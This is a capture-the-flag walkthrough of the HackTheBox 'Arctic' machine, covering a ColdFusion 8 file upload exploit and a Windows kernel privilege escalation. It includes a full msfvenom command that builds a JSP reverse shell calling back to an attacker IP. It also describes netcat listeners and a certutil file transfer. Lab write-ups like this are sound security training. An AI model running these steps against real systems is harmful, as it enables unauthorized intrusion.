HackTheBox “Arctic” Walkthrough
Arctic, an easy-level Windows machine on HackTheBox, presents a straightforward challenge in which an arbitrary file upload vulnerability in the Adobe ColdFusion 8 web application was exploited. By leveraging this vulnerability, the attacker successfully obtained user-level rights. Furthermore, privilege escalation was achieved through the utilization of a Windows Kernel Exploit.
Let’s get started! 🚀
Recon & Enumeration
Let’s use nmap to scan for open ports and services:
Visit the application on port 8500.
Accessing the /CFIDE directory redirects to an alternate file listing.
Upon selecting the administrator option, an “Adobe ColdFusion 8” application is presented.
Performing a basic searchsploit search reveals the presence of several available exploits.
In addition to using searchsploit, conducting a search on Google also yields potential exploits.
let’s go with the following exploit.
The exploit has been downloaded to our attack box.
It indicates the requirement for a JSP file containing a reverse shell. We can generate one using msfvenom as follows:
Execute the command below to create the JSP payload:
sudo msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.14.11 lport=4343 -f raw > payload.jsp
Once the payload has been created, we will proceed to execute the script. Please refer to the usage instructions provided:
Before accessing the website, it is necessary to initiate a listener to capture the shell. This can be accomplished using netcat.
After starting the listener, we will proceed to visit the following page:
http://10.10.10.11:8500/userfiles/file/exploit.jsp
Upon accessing the page, a shell is obtained.
As we currently have limited privileges, we need to elevate our access rights. To assist with this, we will use Windows suggester to look for potential exploits. Let’s begin by retrieving the system information using the command “systeminfo”.
We have saved the system information obtained from the target machine in a text file within our attack box. You can download the tool from the following location: Windows Exploit Suggester.
Download the Windows Exploit Suggester’s database file.
Run the suggester using the provided database and system information inputs.
We will proceed with the MS10–059 exploit. You can download the exploit here.
To transfer the executable file to the Windows system, we will set up a Python HTTP server in the directory containing the file.
On the Windows machine, a folder named C:/Temp will be created. Subsequently, we will use certutil to transfer the executable file to this location.
Execute the exploit.
We need to start a listener.
Re-run the exploit, providing the required inputs of the attacking box’s IP address and port.
As a result, a system shell is successfully obtained.
Cheers.
